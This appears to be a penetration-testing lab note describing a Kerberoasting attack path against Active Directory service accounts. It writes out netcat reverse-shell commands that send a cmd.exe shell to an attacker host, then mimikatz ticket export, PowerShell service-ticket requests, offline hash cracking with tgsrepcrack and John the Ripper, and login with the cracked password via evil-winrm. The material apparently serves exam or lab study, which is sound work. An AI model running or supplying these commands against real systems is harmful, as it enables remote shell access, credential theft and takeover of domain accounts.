Service Account Attacks (Example Path)
- 1.Make sure you have the stable shell. This is to ensure we can run the mimikatz on the machine.
Transfer nc.file and execute the following & have the nc listening on kali.
PS C:\Windows\Temp> C:\Windows\Temp\nc.exe 192.168.119.146 443 -e cmd.exe (powershell.exe)
C:\Inetpub\Scripts\nc.exe 192.168.119.181 443 -e cmd.exe
2. Go through the enumeration methods and see if there's any service accounts.
- A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.
- Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.
- Query the Domain Controller in search of SPNs.
- SPN Examples
CIFS/MYCOMPUTER$- file share access.
LDAP/MYCOMPUTER$- querying AD info via. LDAP.
HTTP/MYCOMPUTER$- Web services such as IIS.
nslookupof the service hostname -> see if there is an entrypoint here.
- Automated SPN enum scripts:
# Kerberoast: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
# Powershell Empire: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
Take notes of this account name you found!
3. Transfer mimikatz.exe to the host and run it. (sometimes, mimikatz version may matter - try 2.2.0 if one doesn't work)
3.Use the SPN to dump the kerberos tickets
- If we know the
serviceprincipalnamevalue from prior AD enum, we can target the SPN by by requesting a service ticket for it from the Domain Controller and access resources from the service with our own ticket.
# request service ticket
PS> Add-Type -AssemblyName System.IdentityModel
PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '[service_principal_name]'
# export cached tickets
mimikatz > kerberos::list /export
It's important to take notes of the "SAMAccountName" which we will use as a username at the next stage when we try to login to the account via evil-winrm.
Crack SPN hashes
$ python3 tgsrepcrack.py rockyou.txt [ticket.kirbi] # locally crack hashes
PS> Invoke-Kerberoast.ps1 # crack hashes on target
# John the Ripper
move the ticket to the master directory where the scripts live (mv /home/kali/transfer/AD/ticket.kirbi /home/kali/transfer/Downloads/kerberoast-master/)
$ python3 kirbi2john.py -o johncrackfile ticket.kirbi # convert ticket to john file
$ john --wordlist=rockyou.txt johncrackfile
After crack the hashes, you can run
./evil-winrm.rb -i 10.11.1.121 -u sqlServer -p PASS